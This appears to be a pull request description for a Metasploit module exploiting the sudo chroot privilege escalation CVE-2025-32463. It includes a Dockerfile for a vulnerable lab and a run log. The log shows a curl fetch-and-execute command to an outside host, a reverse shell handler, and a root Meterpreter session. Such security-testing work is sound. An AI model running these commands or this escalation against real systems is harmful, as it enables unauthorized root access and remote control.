     register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")
 


### PR DESCRIPTION
This PR adds a local module for CVE-2025-32463 - local privilege escalation in sudo before version 1.9.17p1. The module requires existing session and ability to compile C payload on the target machine.

## Installation

1. Create `Dockerfile`:
```
# ----- Dockerfile -----
FROM ubuntu:24.04
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git ca-certificates && \
    rm -rf /var/lib/apt/lists/*
WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && make && make install
RUN useradd -m -s /bin/bash msfuser
USER msfuser
WORKDIR /home/msfuser
CMD ["/bin/bash"]
```
1. `docker build -t sudo-chroot .`
1. `docker run -it --rm --privileged sudo-chroot`

## Verification Steps


1. Start msfconsole
2. Get existing session to low-privileged user
3. Do: `use linux/local/sudo_chroot_cve_2025_32463`
4. Set target payload
5. Do: `set lhost [attacker IP address]`
6. Do: `set lport [attacker port]`
7. Do: `run`

## Options

### COMPILE

Option setting if compile target payload on the target.

### COMPILER

Option setting the compiler to compile target payload.


## Scenarios

```
msf6 exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true 
[*] Command to run on remote host: curl -so ./YoGpAgWbO http://192.168.168.128:8080/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./YoGpAgWbO;./YoGpAgWbO&
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Running version 1.9.16.2
[*] Writing '/tmp/Xw1XwkTPC' (117 bytes) ...
[*] Max line length is 65537
[*] Writing 117 bytes in 1 chunks of 420 bytes (octal-encoded), using printf
[*] Creating directory /tmp/ugJjJFSc9q
[*] /tmp/ugJjJFSc9q created
[*] Max line length is 65537
[*] Writing 216 bytes in 1 chunks of 763 bytes (octal-encoded), using printf
[*] Client 192.168.168.140 requested /Q7JGOkCYlO14PhxIQeJRIQ
[*] Sending payload to 192.168.168.140 (curl/8.14.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Launching exploit...
[*] Sending stage (3090404 bytes) to 192.168.168.140
[+] Deleted /tmp/Xw1XwkTPC
[+] Deleted /tmp/ugJjJFSc9q
[*] Meterpreter session 10 opened (192.168.168.128:4444 -> 192.168.168.140:41672) at 2025-07-10 16:12:58 +0200

meterpreter > sysinfo 
Computer     : kali.kali
OS           : Debian  (Linux 6.12.25-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```
